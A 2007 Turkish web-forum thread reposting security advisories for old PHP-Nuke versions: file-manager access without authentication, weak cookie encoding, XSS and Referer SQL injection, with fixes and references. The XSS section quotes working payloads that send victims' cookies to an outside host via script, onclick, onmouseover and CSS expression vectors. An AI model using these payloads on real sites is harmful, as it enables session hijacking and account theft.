Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 734
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 ??? Sitem deki Haberleri ..
(25384 okuma, 26 yanıt)
 Free Hosta Php Nuke Kurul..
(16471 okuma, 14 yanıt)
 EKLENTİ: Misafire mesajın..
(36886 okuma, 38 yanıt)
 Php Nuke 9.0 Geliyor..
(20889 okuma, 19 yanıt)
 Bu başlık için mesaj bulu..
(14036 okuma, 15 yanıt)
 Facebook Sohbet Tipi Sohb..
(17767 okuma, 15 yanıt)
 üye aktivasyon..
(10647 okuma, 8 yanıt)
 Facebook tarzı altbar... ..
(6267 okuma, 1 yanıt)
 kaldırmak istediğim bölüm..
(6543 okuma, 2 yanıt)
 Resimli RSS..
(23230 okuma, 25 yanıt)
 Onay linkini kaldirmak..
(11081 okuma, 8 yanıt)
 Yardım :( Site açılırken ..
(6646 okuma, 2 yanıt)
 .Htaccess ile uzantıda ke..
(8277 okuma, 4 yanıt)
 block genişliği..
(5713 okuma, 1 yanıt)
 Haber Resimleri ve Slide ..
(14419 okuma, 12 yanıt)
 Foruma büyük boyutlu resi..
(7310 okuma, 3 yanıt)
 Php-Nuke 8.0 Paket..
(9439 okuma, 6 yanıt)
 Hangi sürümü önerirsiniz?..
(10502 okuma, 8 yanıt)
 ethai1 3..
(13161 okuma, 10 yanıt)
 Yeni PEHASPESEO..
(69853 okuma, 82 yanıt)
 Türkçe Karakter sorunu ?..
(37747 okuma, 36 yanıt)
 tek modul için sağ ve sol..
(11412 okuma, 8 yanıt)
 Php-nuke8.0 başlıklarda t..
(10592 okuma, 8 yanıt)
 Phpden iyi anlayan..
(5422 okuma, 1 yanıt)
 Php nuke 7.6 - 3.1 patch ..
(73229 okuma, 89 yanıt)
 Mp3 Üst Player Yardım..
(29524 okuma, 40 yanıt)
 Toplu üyelik silme?..
(11128 okuma, 8 yanıt)
 Çözümleyemediğim hata.....
(12390 okuma, 11 yanıt)
 bloğu kayan hale getirmek..
(5975 okuma, 2 yanıt)
 Makale modulu..
(8587 okuma, 5 yanıt)
 PHP-Nuke Haber V.1 Paylas..
(85248 okuma, 121 yanıt)
 title değiştirme..
(10304 okuma, 6 yanıt)
 Arkadaşlar bu sorunun çöz..
(10038 okuma, 6 yanıt)
 Php Nuke 8.1..
(4347 okuma, 0 yanıt)
 merhaba..
(10283 okuma, 9 yanıt)
 Anasayfa için boş modül o..
(13505 okuma, 13 yanıt)
 admin panelinde Access De..
(6390 okuma, 2 yanıt)
 Bu başlığa hiç cevap gelm..
(26381 okuma, 25 yanıt)
 Nuke Tema yapilisi..
(17125 okuma, 16 yanıt)
 Mavisce-net temasina bann..
(8727 okuma, 6 yanıt)
 PHP-Nuke wTeam - eklentil..
(6639 okuma, 2 yanıt)
 coppermine hata..
(10693 okuma, 8 yanıt)
 içerik tanıtımı..
(6281 okuma, 2 yanıt)
 Haber Ve İçeriğe Resim Ek..
(7168 okuma, 3 yanıt)
 google keywords..
(8969 okuma, 6 yanıt)
 8.0'da html sorunu..
(5501 okuma, 1 yanıt)
 PHP-Nuke_8.1.3.5+NukeSent..
(54023 okuma, 76 yanıt)
 üye olunurken gereksiz is..
(10021 okuma, 7 yanıt)
 Arkadaşlar kolifa haber s..
(6358 okuma, 2 yanıt)
 Hesabınız'a tıklayınca te..
(10497 okuma, 7 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Php-Nuke ve Güvenlik açıkları..
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Php-Nuke ve Güvenlik açıkları..

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
asimcan
Mesaj: 500+
Mesaj: 500+





Kayıt: Aug 30, 2007
Mesajlar: 834
Konum: istanbul

MesajTarih: 2007-10-05, 22:59:28    Mesaj konusu: Php-Nuke ve Güvenlik açıkları.. Alıntıyla Cevap Gönder

Kullandığımız portallar ne kadar güvenli birde burdan bakalım..

PHP Nuke dosya kopyalama ve silme açığı ;

PHP Nuke, PHP script dili ile uygulanmış bir web portal yaratma ve yönetim
paketidir. Varsayılan kurulum ile, sunucu dosya sistemindeki dosyaları kopyalama
ve silmede kullanılabilen 'admin/case/case.filemanager.php' script`i gelmektedir.
Script, sadece kimlik tanılamasında sorumlu bir administrative script`ten çağrıldığına
emin olan bir kod içeriyor fakat bunun uygulanışı hatalı. Sonuç olarak uzaktaki
herhangi bir kullanıcı kimlik tanılaması olmadan direk olarak script`i çağırabilir ve
script`in çalıştığı kullanıcı haklarına göre sunucu üzerinde herhangi bir dosyayı
kopyalayabilir, silebilir.

Çözüm:
Magnux Software aşağıdaki çözümü önermiş:
Web sunucusu dosya sistemine erişimi engellemek için aşağıdaki komutlar
kullanılabilir:
# cd php-nuke-document-root
# chmod 0 admin/case/case.filemanager.php
Henüz bir yama çıkmadı.

ref: http://www.securityfocus.com/bid/3510


Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 5.2

Etkilenmeyenler:


PHP Nuke kullanıcı c o o k i e`si zayıf kriptolama açığı

Bir kullanıcıya PHP-Nuke tabanlı bir sayfada kimlik tanılaması uygulandığında
kullanıcı hesabı ve şifreyi içeren bir c o o k i e yaratılıyor. Şifre 'Base 64 encoding' ile
kodlanıyor ve c o o k i e içeriğine erişebilen herkes tarafından kolaylıkla dekod
edilebilir. Bunun sonucunda kullanıcının hesabının ele geçirilmesi mümkün.
PHP-Nuke`un eski sürümlerininde bu açıktan etkilenmesi muhtemel. PostNuke
0.6.4`de bu açıktan etkileniyor.

Çözüm:
Henüz bir yama çıkmadı

ref: http://www.securityfocus.com/bid/3567


Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PostNuke 0.64
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32

Etkilenmeyenler:

PHP-Nuke çapraz site betik çalıştırma açıkları

PHP-Nuke'da çeşitli çapraz site betik çalıştırma (XSS-Cross Site Scripting) açıkları olduğu rapor edildi.
Bir saldırgan, kullanıcıların kötü amaçlı bir linki ziyaret etmesini sağlayarak bu açıktan yararlanabilir. Saldırganın sağladığı HTML ve betik kodu web istemcisinde çalıştırılabilir.

Saldırganlar bu açığı web içeriğini farklı göstermek veya çerez-tabanlı kimlik tanılama bilgilerini çalmak için kullanabilirler.

Örnek:
Aşağıdaki örnekler Matthew Murphy tarafından sağlanmış:
<SCRI*PT>location.href="http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref="+document.URL+"c o o k i e="+document.c o o k i e;

<B
STYLE="left:expression(e v a l('location.href=\'http://www.techie.hopto.org/
fetch.php?email=mattmurphy@kc.rr.com&ref=\'+document.URL+\'c o o k i e=\'+
document.c o o k i e'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'c o o k i e='+document.c o o k i e">
Don't Click</B>
<B
ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'c o o k i e='+document.c o o k i e">Keep
Away!</B>

Çözüm:
Henüz bir yama çıkmadı.


Açığı gerçekleştirme
Yerel:

Hayır

Uzaktan:

Evet

Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2 a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PHP-Nuke 5.4
Francisco Burzi PHP-Nuke 5.5
Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 BETA 1

Etkilenmeyenler:

PHP-Nuke HTTP "referer" SQL sorgusu ekleme açığı

HTTP başlığının referer alanında gönderilen veriler, index.php dosyasında SQL sorgusunda kullanılmadan önce doğru olarak filtrelenmiyor.
Açığın 7.9 sürümünde olduğu onaylandı ve 8.0 sürümünün de etkilendiği rapor edildi. Diğer sürümler de etkileniyor olabilir.

Çözüm:
index.php kaynak kodunda değişiklik yaparak doğru filtrelemenin yapılmasını sağlayın.

Kaynak: http://secunia.com/advisories/24224/


Etkilenen Sistemler
Etkilenenler:

PHP-Nuke 5.x
PHP-Nuke 6.x
PHP-Nuke 7.x
PHP-Nuke 8.x

Etkilenmeyenler:

PHP-Nuke Signature alanı XSS açığı

PHP-Nuke'ta yeni bir çapraz site betik çalıştırma açığı bulunduğu rapor edildi. Web isteklerinin düzgün kontrol edilmemesi sonucu betik kodlarının PHP script isteklerine gömülmesi mümkün oluyor.
Bu sayede uzaktaki bir saldırgan çerez-tabanlı kimlik tanılama bilgilerini çalabilir.

Çözüm:
Henüz bir yama çıkmadı.

kaynak: http://online.securityfocus.com/bid/6503


Açığı gerçekleştirme
Yerel:

Hayır

Uzaktan:

Evet

Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 BETA 1

Etkilenmeyenler:

PHPNuke Cross-Site Scripting güvenlik açığı

PHPNuke cross-site scripting açığından etkileniyor. Kötü amaçlı script kodunu içeren
PHPNuke kullanıcı bilgileri sayfası user.php`ye bir link yaratmak mümkün.
Durumdan şüphelenmeyen bir web kullanıcısı linke tıkladığında kötü amaçlı kod
çalışıyor.
Bu saldırı ile bir kullanıcının, etkilenen PHPNuke sitesine ait c o o k i e`lerdeki kimlik
tanılama bilgileri çalınabilir.
PostNuke`un da etkilendiği rapor edildi.
Aşağıdaki örnek bir alarm kutusunu görüntülenmesini sağlıyor:
http://phpnukesite/user.php?op=userinfo&uname=<script>a l e r t(document.c o o k i e);</script>

Çözüm:
Geçici çözüm:
Web browser`ın özelliklerini kullanarak JavaScript çalıştırılmasını kapatın.
Henüz bir yama çıkmadı.

ref: http://www.securityfocus.com/bid/3609


Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 1.0
Francisco Burzi PHP-Nuke 2.5
Francisco Burzi PHP-Nuke 3.0
- Linux kernel 2.2
Francisco Burzi PHP-Nuke 4.0
Francisco Burzi PHP-Nuke 4.3
Francisco Burzi PHP-Nuke 4.4
Francisco Burzi PHP-Nuke 4.4.1a
Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PostNuke 0.62
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Francisco Burzi PostNuke 0.63
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Francisco Burzi PostNuke 0.64
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32

Etkilenmeyenler:

( Alıntıdır )

Php-Nuke içinde bunların dışında bildiğiniz açıklar varsa burda yazmanızı öneririm. ki bizde ona göre açıklarımızı kapatıp daha güvenli bir web sitesi hazırlayalım..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-06-02, 21:26:55    Mesaj konusu: Forum Arası Reklamlar


Başa dön
polibo06
Site Yöneticisi
Site Yöneticisi





Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim

MesajTarih: 2007-10-05, 23:12:33    Mesaj konusu: Alıntıyla Cevap Gönder

yazını sonuna kadar okudum bu güzel paylaşım için teşekürler.Biraz yorum yapmak gerekirse artık bu hack metotları eskide kaldı ancak biri dikkatimi çekti.http önerenlerde sql açığı demişsin. nuke 8 de dahil olmak üzere etkileniyor demişsin.İndex.php değşiiklik ile giderilebilinir diye bir ibare var bunu biraz daha açıklayabilimisin?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
asimcan
Mesaj: 500+
Mesaj: 500+





Kayıt: Aug 30, 2007
Mesajlar: 834
Konum: istanbul

MesajTarih: 2007-10-05, 23:17:24    Mesaj konusu: Alıntıyla Cevap Gönder

hocam altınada yazdığım gibi alıntıdır. ingilizceniz varsa o kısımda verilen linkten çözüme ulaşabilirsiniz sanırım
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok nuke için sağ tarafta kayan reklam sC... Rapcoast Php Nuke Sorunlarınız 13 2010-07-21, 17:55:35 Son Mesajı Görüntüle
Yeni mesaj yok NetOpsiyon Nuke Son Yoklama ramrodboy İşbirliği&Etkinlikler 26 2010-07-17, 14:26:48 Son Mesajı Görüntüle
Yeni mesaj yok php-nuke Den Kayıp Yapmadan Başka Sis... DursunKaptan Php Nuke Sorunlarınız 18 2010-07-16, 20:05:43 Son Mesajı Görüntüle
Yeni mesaj yok Artisteer ile Nuke'ye Tema hazirlama bozkurt69 Php Nuke Tema Paylaşımları 7 2010-07-15, 12:54:19 Son Mesajı Görüntüle
Yeni mesaj yok Nuke sentinelin sorgulamasındaki bir ... mtalha88 Php Nuke Güvenlik 0 2010-07-15, 00:21:17 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright